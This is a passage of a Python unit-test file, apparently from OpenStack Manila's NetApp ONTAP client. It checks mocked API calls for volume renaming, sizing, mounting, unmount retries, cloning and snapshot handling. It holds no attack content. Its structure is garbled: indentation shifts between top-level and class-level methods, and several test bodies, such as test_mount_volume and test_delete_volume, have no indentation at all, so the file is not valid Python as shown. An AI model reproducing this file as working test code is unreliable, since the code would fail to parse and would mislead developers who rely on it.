    self.client.set_volume_name(fake.SHARE_NAME, 'new_name')
    volume_rename_api_args = {
        'volume': fake.SHARE_NAME,
        'new-volume-name': 'new_name',
    }
    self.client.send_request.assert_called_once_with(
        'volume-rename', volume_rename_api_args)
def test_manage_volume_no_optional_args(self):
    """Defaults: thick provisioning and efficiency features disabled."""
    self.mock_object(self.client, 'send_request')
    mock_update_volume_efficiency_attributes = self.mock_object(
        self.client, 'update_volume_efficiency_attributes')
    self.client.manage_volume(fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME)
    volume_modify_iter_api_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
                    'name': fake.SHARE_NAME,
                },
            },
        },
        'attributes': {
            'volume-attributes': {
                'volume-inode-attributes': {},
                'volume-language-attributes': {},
                'volume-snapshot-attributes': {},
                'volume-space-attributes': {
                    # No thin_provisioned flag -> thick ('volume') guarantee.
                    'space-guarantee': 'volume',
                },
            },
        },
    }
    self.client.send_request.assert_called_once_with(
        'volume-modify-iter', volume_modify_iter_api_args)
    mock_update_volume_efficiency_attributes.assert_called_once_with(
        fake.SHARE_NAME, False, False)
def test_manage_volume_all_optional_args(self):
    """All optional args populate the corresponding attribute groups."""
    self.mock_object(self.client, 'send_request')
    mock_update_volume_efficiency_attributes = self.mock_object(
        self.client, 'update_volume_efficiency_attributes')
    self.client.manage_volume(fake.SHARE_AGGREGATE_NAME,
                              fake.SHARE_NAME,
                              thin_provisioned=True,
                              snapshot_policy=fake.SNAPSHOT_POLICY_NAME,
                              language=fake.LANGUAGE,
                              dedup_enabled=True,
                              compression_enabled=False,
                              max_files=fake.MAX_FILES)
    volume_modify_iter_api_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
                    'name': fake.SHARE_NAME,
                },
            },
        },
        'attributes': {
            'volume-attributes': {
                'volume-inode-attributes': {
                    'files-total': fake.MAX_FILES,
                },
                'volume-language-attributes': {
                    'language': fake.LANGUAGE,
                },
                'volume-snapshot-attributes': {
                    'snapshot-policy': fake.SNAPSHOT_POLICY_NAME,
                },
                'volume-space-attributes': {
                    # thin_provisioned=True disables the space guarantee.
                    'space-guarantee': 'none',
                },
            },
        },
    }
    self.client.send_request.assert_called_once_with(
        'volume-modify-iter', volume_modify_iter_api_args)
    mock_update_volume_efficiency_attributes.assert_called_once_with(
        fake.SHARE_NAME, True, False)
@ddt.data(
    {'existing': (True, True), 'desired': (True, True)},
    {'existing': (True, True), 'desired': (False, False)},
    {'existing': (True, True), 'desired': (True, False)},
    {'existing': (True, False), 'desired': (True, False)},
    {'existing': (True, False), 'desired': (False, False)},
    {'existing': (True, False), 'desired': (True, True)},
    {'existing': (False, False), 'desired': (False, False)},
    {'existing': (False, False), 'desired': (True, False)},
    {'existing': (False, False), 'desired': (True, True)},
)
@ddt.unpack
def test_update_volume_efficiency_attributes(self, existing, desired):
    """Enable/disable calls are made only when the state must change.

    Each tuple is (dedupe, compression); all reachable transitions from
    the current state to the desired state are exercised.
    """
    existing_dedupe = existing[0]
    existing_compression = existing[1]
    desired_dedupe = desired[0]
    desired_compression = desired[1]
    self.mock_object(
        self.client,
        'get_volume_efficiency_status',
        mock.Mock(return_value={'dedupe': existing_dedupe,
                                'compression': existing_compression}))
    mock_enable_compression = self.mock_object(self.client,
                                               'enable_compression')
    mock_disable_compression = self.mock_object(self.client,
                                                'disable_compression')
    mock_enable_dedup = self.mock_object(self.client, 'enable_dedup')
    mock_disable_dedup = self.mock_object(self.client, 'disable_dedup')
    self.client.update_volume_efficiency_attributes(
        fake.SHARE_NAME, desired_dedupe, desired_compression)
    if existing_dedupe == desired_dedupe:
        self.assertFalse(mock_enable_dedup.called)
        self.assertFalse(mock_disable_dedup.called)
    elif existing_dedupe and not desired_dedupe:
        self.assertFalse(mock_enable_dedup.called)
        self.assertTrue(mock_disable_dedup.called)
    elif not existing_dedupe and desired_dedupe:
        self.assertTrue(mock_enable_dedup.called)
        self.assertFalse(mock_disable_dedup.called)
    if existing_compression == desired_compression:
        self.assertFalse(mock_enable_compression.called)
        self.assertFalse(mock_disable_compression.called)
    elif existing_compression and not desired_compression:
        self.assertFalse(mock_enable_compression.called)
        self.assertTrue(mock_disable_compression.called)
    elif not existing_compression and desired_compression:
        self.assertTrue(mock_enable_compression.called)
        self.assertFalse(mock_disable_compression.called)
def test_set_volume_size(self):
    """Size in GB is converted to bytes for volume-modify-iter."""
    api_response = netapp_api.NaElement(fake.VOLUME_MODIFY_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.client.set_volume_size(fake.SHARE_NAME, 10)
    volume_modify_iter_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'name': fake.SHARE_NAME
                }
            }
        },
        'attributes': {
            'volume-attributes': {
                'volume-space-attributes': {
                    # 10 GiB expressed in bytes.
                    'size': 10737418240,
                },
            },
        },
    }
    self.client.send_request.assert_has_calls([
        mock.call('volume-modify-iter', volume_modify_iter_args)])
def test_set_volume_size_api_error(self):
    """A failure record inside the modify-iter response is re-raised."""
    api_response = netapp_api.NaElement(
        fake.VOLUME_MODIFY_ITER_ERROR_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(netapp_api.NaApiError,
                      self.client.set_volume_size,
                      fake.SHARE_NAME,
                      10)
def test_volume_exists(self):
    """volume_exists queries by name and requests only the name back."""
    api_response = netapp_api.NaElement(fake.VOLUME_GET_NAME_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.volume_exists(fake.SHARE_NAME)
    volume_get_iter_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'name': fake.SHARE_NAME
                }
            }
        },
        'desired-attributes': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'name': None
                }
            }
        }
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('volume-get-iter', volume_get_iter_args)])
    self.assertTrue(result)
def test_volume_exists_not_found(self):
    """A no-records response means the volume does not exist.

    Mocks 'send_iter_request' (the method volume_exists actually invokes,
    as asserted by test_volume_exists) rather than the lower-level
    'send_request', so the test stubs the same seam as its sibling.
    """
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    self.assertFalse(self.client.volume_exists(fake.SHARE_NAME))
def test_snapshot_exists(self):
    """snapshot_exists queries by snapshot and volume name."""
    api_response = netapp_api.NaElement(fake.VOLUME_GET_NAME_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client.snapshot_exists(fake.SNAPSHOT_NAME,
                                         fake.SHARE_NAME)
    snapshot_get_iter_args = {
        'query': {
            'snapshot-info': {
                'name': fake.SNAPSHOT_NAME,
                'volume': fake.SHARE_NAME,
            }
        },
        # busy/owner info is requested so callers can detect in-use snaps.
        'desired-attributes': {
            'snapshot-info': {
                'name': None,
                'volume': None,
                'busy': None,
                'snapshot-owners-list': {
                    'snapshot-owner': None,
                }
            }
        }
    }
    self.client.send_request.assert_has_calls([
        mock.call('snapshot-get-iter', snapshot_get_iter_args)])
    self.assertTrue(result)
def test_snapshot_exists_not_found(self):
    """A no-records response means the snapshot does not exist."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.assertFalse(self.client.snapshot_exists(fake.SNAPSHOT_NAME,
                                                 fake.SHARE_NAME))
@ddt.data({
    'api_response_xml': fake.SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE,
    'raised_exception': exception.SnapshotUnavailable,
}, {
    'api_response_xml': fake.SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE,
    'raised_exception': exception.NetAppException,
})
@ddt.unpack
def test_snapshot_exists_error(self, api_response_xml, raised_exception):
    """Error records in the get-iter response map to typed exceptions."""
    api_response = netapp_api.NaElement(api_response_xml)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(raised_exception,
                      self.client.snapshot_exists,
                      fake.SNAPSHOT_NAME,
                      fake.SHARE_NAME)
def test_get_aggregate_for_volume(self):
    """The containing aggregate is read from volume-id-attributes."""
    api_response = netapp_api.NaElement(
        fake.GET_AGGREGATE_FOR_VOLUME_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_aggregate_for_volume(fake.SHARE_NAME)
    volume_get_iter_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'name': fake.SHARE_NAME
                }
            }
        },
        'desired-attributes': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'containing-aggregate-name': None,
                    'name': None
                }
            }
        }
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('volume-get-iter', volume_get_iter_args)])
    self.assertEqual(fake.SHARE_AGGREGATE_NAME, result)
def test_get_aggregate_for_volume_not_found(self):
    """A missing volume raises rather than returning None."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.client.get_aggregate_for_volume,
                      fake.SHARE_NAME)
def test_volume_has_luns(self):
    """volume_has_luns is True when lun-get-iter returns any record."""
    api_response = netapp_api.NaElement(fake.LUN_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.volume_has_luns(fake.SHARE_NAME)
    lun_get_iter_args = {
        'query': {
            'lun-info': {
                'volume': fake.SHARE_NAME,
            },
        },
        'desired-attributes': {
            'lun-info': {
                'path': None,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('lun-get-iter', lun_get_iter_args)])
    self.assertTrue(result)
    def test_volume_has_luns_not_found(self):
        """volume_has_luns returns False when no LUN records exist."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        # NOTE(review): 'send_request' is mocked here while the positive
        # test mocks 'send_iter_request' — presumably the iter wrapper
        # delegates to send_request; confirm against the client code.
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))

        result = self.client.volume_has_luns(fake.SHARE_NAME)

        self.assertFalse(result)
    def test_volume_has_junctioned_volumes(self):
        """volume_has_junctioned_volumes returns True when other volumes
        are mounted beneath this volume's junction path."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_ITER_JUNCTIONED_VOLUMES_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))
        fake_junction_path = '/%s' % fake.SHARE_NAME
        self.mock_object(self.client,
                         'get_volume_junction_path',
                         mock.Mock(return_value=fake_junction_path))

        result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)

        # The wildcard suffix matches any volume junctioned below us.
        volume_get_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'junction-path': fake_junction_path + '/*',
                    },
                },
            },
            'desired-attributes': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'name': None,
                    },
                },
            },
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('volume-get-iter', volume_get_iter_args)])
        self.assertTrue(result)
    def test_volume_has_junctioned_volumes_no_junction_path(self):
        """An unmounted volume (empty junction path) cannot have
        junctioned children, so the result is False."""
        self.mock_object(self.client,
                         'get_volume_junction_path',
                         mock.Mock(return_value=''))

        result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)

        self.assertFalse(result)
    def test_volume_has_junctioned_volumes_not_found(self):
        """A no-records response means no junctioned volumes: False."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))
        fake_junction_path = '/%s' % fake.SHARE_NAME
        self.mock_object(self.client,
                         'get_volume_junction_path',
                         mock.Mock(return_value=fake_junction_path))

        result = self.client.volume_has_junctioned_volumes(fake.SHARE_NAME)

        self.assertFalse(result)
    def test_get_volume_at_junction_path(self):
        """get_volume_at_junction_path returns a dict describing the
        volume mounted at the given junction path."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))
        fake_junction_path = '/%s' % fake.SHARE_NAME

        result = self.client.get_volume_at_junction_path(fake_junction_path)

        volume_get_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'junction-path': fake_junction_path,
                    },
                },
            },
            'desired-attributes': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'containing-aggregate-name': None,
                        'junction-path': None,
                        'name': None,
                        'type': None,
                        'style': None,
                    },
                    'volume-space-attributes': {
                        'size': None,
                    }
                },
            },
        }
        # The result dict flattens the ZAPI attributes of interest.
        expected = {
            'aggregate': fake.SHARE_AGGREGATE_NAME,
            'junction-path': fake_junction_path,
            'name': fake.SHARE_NAME,
            'type': 'rw',
            'style': 'flex',
            'size': fake.SHARE_SIZE,
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('volume-get-iter', volume_get_iter_args)])
        self.assertDictEqual(expected, result)
    def test_get_volume_at_junction_path_not_specified(self):
        """Passing None as junction path short-circuits to None."""
        result = self.client.get_volume_at_junction_path(None)
        self.assertIsNone(result)
    def test_get_volume_at_junction_path_not_found(self):
        """No records at the junction path yields None."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))
        fake_junction_path = '/%s' % fake.SHARE_NAME

        result = self.client.get_volume_at_junction_path(fake_junction_path)

        self.assertIsNone(result)
    def test_get_volume_to_manage(self):
        """get_volume_to_manage looks up a volume by aggregate and name
        and returns its identifying attributes."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_ITER_VOLUME_TO_MANAGE_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_volume_to_manage(fake.SHARE_AGGREGATE_NAME,
                                                  fake.SHARE_NAME)

        volume_get_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'containing-aggregate-name': fake.SHARE_AGGREGATE_NAME,
                        'name': fake.SHARE_NAME,
                    },
                },
            },
            'desired-attributes': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'containing-aggregate-name': None,
                        'junction-path': None,
                        'name': None,
                        'type': None,
                        'style': None,
                        'owning-vserver-name': None,
                    },
                    'volume-space-attributes': {
                        'size': None,
                    }
                },
            },
        }
        # Unlike get_volume_at_junction_path, this result also includes
        # the owning vserver name.
        expected = {
            'aggregate': fake.SHARE_AGGREGATE_NAME,
            'junction-path': '/%s' % fake.SHARE_NAME,
            'name': fake.SHARE_NAME,
            'type': 'rw',
            'style': 'flex',
            'size': fake.SHARE_SIZE,
            'owning-vserver-name': fake.VSERVER_NAME
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('volume-get-iter', volume_get_iter_args)])
        self.assertDictEqual(expected, result)
    def test_get_volume_to_manage_not_found(self):
        """A no-records response makes get_volume_to_manage return None."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_volume_to_manage(fake.SHARE_AGGREGATE_NAME,
                                                  fake.SHARE_NAME)

        self.assertIsNone(result)
    def test_create_volume_clone(self):
        """create_volume_clone issues volume-clone-create from the parent
        volume/snapshot and mounts the clone at /<share name>."""
        self.mock_object(self.client, 'send_request')

        self.client.create_volume_clone(fake.SHARE_NAME,
                                        fake.PARENT_SHARE_NAME,
                                        fake.PARENT_SNAPSHOT_NAME)

        volume_clone_create_args = {
            'volume': fake.SHARE_NAME,
            'parent-volume': fake.PARENT_SHARE_NAME,
            'parent-snapshot': fake.PARENT_SNAPSHOT_NAME,
            'junction-path': '/%s' % fake.SHARE_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-clone-create', volume_clone_create_args)])
    # Both the success path and the "split already in progress" error
    # (EVOL_CLONE_BEING_SPLIT) must complete without raising.
    @ddt.data(None,
              mock.Mock(side_effect=netapp_api.NaApiError(
                  code=netapp_api.EVOL_CLONE_BEING_SPLIT)))
    def test_split_volume_clone(self, side_effect):
        """split_volume_clone issues volume-clone-split-start and
        tolerates an already-splitting clone."""
        self.mock_object(
            self.client, 'send_request',
            mock.Mock(side_effect=side_effect))

        self.client.split_volume_clone(fake.SHARE_NAME)

        volume_clone_split_args = {'volume': fake.SHARE_NAME}
        self.client.send_request.assert_has_calls([
            mock.call('volume-clone-split-start', volume_clone_split_args)])
    def test_split_volume_clone_api_error(self):
        """Unexpected API errors from volume-clone-split-start propagate."""
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(side_effect=self._mock_api_error()))

        self.assertRaises(netapp_api.NaApiError,
                          self.client.split_volume_clone,
                          fake.SHARE_NAME)
    def test_get_clone_children_for_snapshot(self):
        """get_clone_children_for_snapshot lists clones whose parent is
        the given volume/snapshot pair."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_ITER_CLONE_CHILDREN_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_clone_children_for_snapshot(
            fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        # The query filters on the clone's parent volume and snapshot.
        volume_get_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-clone-attributes': {
                        'volume-clone-parent-attributes': {
                            'name': fake.SHARE_NAME,
                            'snapshot-name': fake.SNAPSHOT_NAME,
                        },
                    },
                },
            },
            'desired-attributes': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'name': None,
                    },
                },
            },
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('volume-get-iter', volume_get_iter_args)])

        expected = [
            {'name': fake.CLONE_CHILD_1},
            {'name': fake.CLONE_CHILD_2},
        ]
        self.assertEqual(expected, result)
    def test_get_clone_children_for_snapshot_not_found(self):
        """No clone children yields an empty list, not an error."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_clone_children_for_snapshot(
            fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        self.assertEqual([], result)
    def test_get_volume_junction_path(self):
        """get_volume_junction_path queries volume-get-volume-path with
        CIFS styling disabled by default."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_VOLUME_PATH_RESPONSE)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_volume_junction_path(fake.SHARE_NAME)

        volume_get_volume_path_args = {
            'volume': fake.SHARE_NAME,
            'is-style-cifs': 'false'
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-get-volume-path', volume_get_volume_path_args)])
        self.assertEqual(fake.VOLUME_JUNCTION_PATH, result)
    def test_get_volume_junction_path_cifs(self):
        """is_style_cifs=True is forwarded as the string 'true' and the
        CIFS-style path is returned."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_VOLUME_PATH_CIFS_RESPONSE)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_volume_junction_path(fake.SHARE_NAME,
                                                      is_style_cifs=True)

        volume_get_volume_path_args = {
            'volume': fake.SHARE_NAME,
            'is-style-cifs': 'true'
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-get-volume-path', volume_get_volume_path_args)])
        self.assertEqual(fake.VOLUME_JUNCTION_PATH_CIFS, result)
    def test_mount_volume_default_junction_path(self):
        """With no junction path given, mount_volume defaults to
        '/<volume name>'."""
        self.mock_object(self.client, 'send_request')

        self.client.mount_volume(fake.SHARE_NAME)

        volume_mount_args = {
            'volume-name': fake.SHARE_NAME,
            'junction-path': '/%s' % fake.SHARE_NAME,
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-mount', volume_mount_args)])
def test_mount_volume(self):
self.mock_object(self.client, 'send_request')
fake_path = '/fake_path'
self.client.mount_volume(fake.SHARE_NAME, junction_path=fake_path)
volume_mount_args = {
'volume-name': fake.SHARE_NAME,
'junction-path': fake_path,
}
self.client.send_request.assert_has_calls([
mock.call('volume-mount', volume_mount_args)])
def test_offline_volume(self):
self.mock_object(self.client, 'send_request')
self.client.offline_volume(fake.SHARE_NAME)
volume_offline_args = {'name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-offline', volume_offline_args)])
    def test_offline_volume_already_offline(self):
        """EVOLUMEOFFLINE (already offline) is tolerated silently."""
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(side_effect=self._mock_api_error(
                             netapp_api.EVOLUMEOFFLINE)))

        self.client.offline_volume(fake.SHARE_NAME)

        volume_offline_args = {'name': fake.SHARE_NAME}
        self.client.send_request.assert_has_calls([
            mock.call('volume-offline', volume_offline_args)])
    def test_offline_volume_api_error(self):
        """Other API errors from volume-offline propagate to the caller."""
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(side_effect=self._mock_api_error()))

        self.assertRaises(netapp_api.NaApiError,
                          self.client.offline_volume,
                          fake.SHARE_NAME)
    def test__unmount_volume(self):
        """_unmount_volume issues volume-unmount without force by default."""
        self.mock_object(self.client, 'send_request')

        self.client._unmount_volume(fake.SHARE_NAME)

        volume_unmount_args = {
            'volume-name': fake.SHARE_NAME,
            'force': 'false'
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-unmount', volume_unmount_args)])
    def test__unmount_volume_force(self):
        """force=True is forwarded as the string 'true'."""
        self.mock_object(self.client, 'send_request')

        self.client._unmount_volume(fake.SHARE_NAME, force=True)

        volume_unmount_args = {'volume-name': fake.SHARE_NAME, 'force': 'true'}
        self.client.send_request.assert_has_calls([
            mock.call('volume-unmount', volume_unmount_args)])
    def test__unmount_volume_already_unmounted(self):
        """EVOL_NOT_MOUNTED (already unmounted) is tolerated silently."""
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(side_effect=self._mock_api_error(
                             netapp_api.EVOL_NOT_MOUNTED)))

        self.client._unmount_volume(fake.SHARE_NAME, force=True)

        volume_unmount_args = {'volume-name': fake.SHARE_NAME, 'force': 'true'}
        self.client.send_request.assert_has_calls([
            mock.call('volume-unmount', volume_unmount_args)])
    def test__unmount_volume_api_error(self):
        """Other API errors from volume-unmount propagate to the caller."""
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(side_effect=self._mock_api_error()))

        self.assertRaises(netapp_api.NaApiError,
                          self.client._unmount_volume,
                          fake.SHARE_NAME,
                          force=True)
    def test_unmount_volume(self):
        """unmount_volume delegates to _unmount_volume once and logs a
        single debug message on first-try success."""
        self.mock_object(self.client, '_unmount_volume')

        self.client.unmount_volume(fake.SHARE_NAME)

        self.client._unmount_volume.assert_called_once_with(fake.SHARE_NAME,
                                                            force=False)
        self.assertEqual(1, client_cmode.LOG.debug.call_count)
        self.assertEqual(0, client_cmode.LOG.warning.call_count)
    def test_unmount_volume_api_error(self):
        """A non-retryable API error is raised immediately with no
        retry logging."""
        self.mock_object(self.client,
                         '_unmount_volume',
                         self._mock_api_error())

        self.assertRaises(netapp_api.NaApiError,
                          self.client.unmount_volume,
                          fake.SHARE_NAME)

        self.assertEqual(1, self.client._unmount_volume.call_count)
        self.assertEqual(0, client_cmode.LOG.debug.call_count)
        self.assertEqual(0, client_cmode.LOG.warning.call_count)
    def test_unmount_volume_with_retries(self):
        """EAPIERROR with a job-ID message is retried; here 5 failures
        then success means 6 attempts and 5 warnings."""
        side_effect = [netapp_api.NaApiError(code=netapp_api.EAPIERROR,
                                             message='...job ID...')] * 5
        side_effect.append(None)
        self.mock_object(self.client,
                         '_unmount_volume',
                         mock.Mock(side_effect=side_effect))
        # Avoid real backoff sleeps in the retry loop.
        self.mock_object(time, 'sleep')

        self.client.unmount_volume(fake.SHARE_NAME)

        self.assertEqual(6, self.client._unmount_volume.call_count)
        self.assertEqual(1, client_cmode.LOG.debug.call_count)
        self.assertEqual(5, client_cmode.LOG.warning.call_count)
    def test_unmount_volume_with_max_retries(self):
        """Persistent retryable failures exhaust the retry budget (10
        attempts) and raise NetAppException."""
        side_effect = [netapp_api.NaApiError(code=netapp_api.EAPIERROR,
                                             message='...job ID...')] * 30
        self.mock_object(self.client,
                         '_unmount_volume',
                         mock.Mock(side_effect=side_effect))
        # Avoid real backoff sleeps in the retry loop.
        self.mock_object(time, 'sleep')

        self.assertRaises(exception.NetAppException,
                          self.client.unmount_volume,
                          fake.SHARE_NAME)

        self.assertEqual(10, self.client._unmount_volume.call_count)
        self.assertEqual(0, client_cmode.LOG.debug.call_count)
        self.assertEqual(10, client_cmode.LOG.warning.call_count)
def test_delete_volume(self):
self.mock_object(self.client, 'send_request')
self.client.delete_volume(fake.SHARE_NAME)
volume_destroy_args = {'name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('volume-destroy', volume_destroy_args)])
    def test_create_snapshot(self):
        """create_snapshot issues snapshot-create for the volume."""
        self.mock_object(self.client, 'send_request')

        self.client.create_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        snapshot_create_args = {
            'volume': fake.SHARE_NAME,
            'snapshot': fake.SNAPSHOT_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call('snapshot-create', snapshot_create_args)])
    # Cover both a free snapshot and one busy due to a volume clone.
    @ddt.data({
        'mock_return': fake.SNAPSHOT_GET_ITER_NOT_BUSY_RESPONSE,
        'expected': {
            'name': fake.SNAPSHOT_NAME,
            'volume': fake.SHARE_NAME,
            'busy': False,
            'owners': set(),
        }
    }, {
        'mock_return': fake.SNAPSHOT_GET_ITER_BUSY_RESPONSE,
        'expected': {
            'name': fake.SNAPSHOT_NAME,
            'volume': fake.SHARE_NAME,
            'busy': True,
            'owners': {'volume clone'},
        }
    })
    @ddt.unpack
    def test_get_snapshot(self, mock_return, expected):
        """get_snapshot returns name/volume/busy/owners parsed from a
        snapshot-get-iter response."""
        api_response = netapp_api.NaElement(mock_return)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        snapshot_get_iter_args = {
            'query': {
                'snapshot-info': {
                    'name': fake.SNAPSHOT_NAME,
                    'volume': fake.SHARE_NAME,
                },
            },
            'desired-attributes': {
                'snapshot-info': {
                    'name': None,
                    'volume': None,
                    'busy': None,
                    'snapshot-owners-list': {
                        'snapshot-owner': None,
                    }
                },
            },
        }
        self.client.send_request.assert_has_calls([
            mock.call('snapshot-get-iter', snapshot_get_iter_args)])
        self.assertDictEqual(expected, result)
    # Each malformed/exceptional response maps to a specific exception:
    # no records -> SnapshotResourceNotFound, ambiguous match ->
    # NetAppException, unavailable -> SnapshotUnavailable, other errors
    # -> NetAppException.
    @ddt.data({
        'api_response_xml': fake.NO_RECORDS_RESPONSE,
        'raised_exception': exception.SnapshotResourceNotFound,
    }, {
        'api_response_xml': fake.SNAPSHOT_GET_ITER_NOT_UNIQUE_RESPONSE,
        'raised_exception': exception.NetAppException,
    }, {
        'api_response_xml': fake.SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE,
        'raised_exception': exception.SnapshotUnavailable,
    }, {
        'api_response_xml': fake.SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE,
        'raised_exception': exception.NetAppException,
    })
    @ddt.unpack
    def test_get_snapshot_error(self, api_response_xml, raised_exception):
        """get_snapshot raises the exception matching each bad response."""
        api_response = netapp_api.NaElement(api_response_xml)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))

        self.assertRaises(raised_exception,
                          self.client.get_snapshot,
                          fake.SHARE_NAME,
                          fake.SNAPSHOT_NAME)
    def test_rename_snapshot(self):
        """rename_snapshot issues snapshot-rename with old and new names."""
        self.mock_object(self.client, 'send_request')

        self.client.rename_snapshot(fake.SHARE_NAME,
                                    fake.SNAPSHOT_NAME,
                                    'new_snapshot_name')

        snapshot_rename_args = {
            'volume': fake.SHARE_NAME,
            'current-name': fake.SNAPSHOT_NAME,
            'new-name': 'new_snapshot_name'
        }
        self.client.send_request.assert_has_calls([
            mock.call('snapshot-rename', snapshot_rename_args)])
    def test_delete_snapshot(self):
        """delete_snapshot issues snapshot-delete for the snapshot."""
        self.mock_object(self.client, 'send_request')

        self.client.delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        snapshot_delete_args = {
            'volume': fake.SHARE_NAME,
            'snapshot': fake.SNAPSHOT_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call('snapshot-delete', snapshot_delete_args)])
    def test_soft_delete_snapshot(self):
        """When the hard delete succeeds, no rename (soft delete) occurs."""
        mock_delete_snapshot = self.mock_object(self.client, 'delete_snapshot')
        mock_rename_snapshot = self.mock_object(self.client, 'rename_snapshot')

        self.client.soft_delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        mock_delete_snapshot.assert_called_once_with(
            fake.SHARE_NAME, fake.SNAPSHOT_NAME)
        self.assertFalse(mock_rename_snapshot.called)
    def test_soft_delete_snapshot_api_error(self):
        """If the hard delete fails, the snapshot is renamed with the
        'deleted_manila_' prefix for later pruning."""
        mock_delete_snapshot = self.mock_object(
            self.client, 'delete_snapshot', self._mock_api_error())
